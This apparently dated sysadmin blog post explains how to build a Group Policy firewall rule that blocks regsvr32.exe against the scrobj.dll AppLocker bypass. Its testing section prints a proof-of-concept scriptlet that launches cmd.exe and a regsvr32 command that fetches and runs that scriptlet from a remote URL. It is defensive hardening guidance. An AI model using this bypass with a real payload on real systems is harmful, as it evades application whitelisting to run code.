GPO to block regsvr32 AppLocker Bypass Vulnerability

This content 4 years old. Please, read this page keeping its age in mind along with the fact technology changes fast and the information on this page me be outdated, not best practice, or plain wrong.

A recently discovered method of bypassing AppLocker by using regsvr32.exe, poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions).  To work around this issue and prevent regsvr32 from accessing remote resources, you can block regsvr32.exe in the Windows Firewall.  Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.

Create a GPO and Edit

In Group Policy Management, I created a new GPO and named it Firewall:  Block regsvr32 then I edited it.

Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security

Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.

2016-04-27_111611

Create a new inbound rule to block regsvr32.exe

Inbound Rule Wizard

2016-04-27_111627

Choose Program as the type of rule to create and click Next >

2016-04-27_111642

Use C:windowssystem32regsvr32.exe as the path; you can either type it in or click Browse… to navigate to it and choose.

2016-04-27_111651

Choose Block as the action and click Next >

2016-04-27_111659

Apply it to all network locations.

2016-04-27_111717

Give the rule a name and possibly a description.

2016-04-27_111733

Rule to block is now listed in Inbound Rules

Outbound Rule Wizard

Repeat the steps from the Inbound Rule Wizard, but as a new Outbound Rules rule.

Link GPO

Now that the GPO is created, you can link the policy within your domain as usual.

Testing

To test that the rule is effective, run gpupdate /force on your system to force an immediate security group policy application.

I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file and save it (doesn’t have to be extension .SCT, can be anything…).

backdoor.sct

<?XML version=1.0?>
<scriptlet>
<registration
 progid=Empire
 classid={F0001111-0000-0000-0000-0000FEEDACDC} >
 <!-- Proof Of Concept - Casey Smith @subTee -->
 <script language=JScript>
 <![CDATA[

 var r = new ActiveXObject(WScript.Shell).Run(cmd.exe);

 ]]>
</script>
</registration>
</scriptlet>

Command to run:

regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll

If a command window opens, the GPO created is not blocking it (for one reason or another; double-check your work).

Speak Your Mind

*

This site uses Akismet to reduce spam. Learn how your comment data is processed.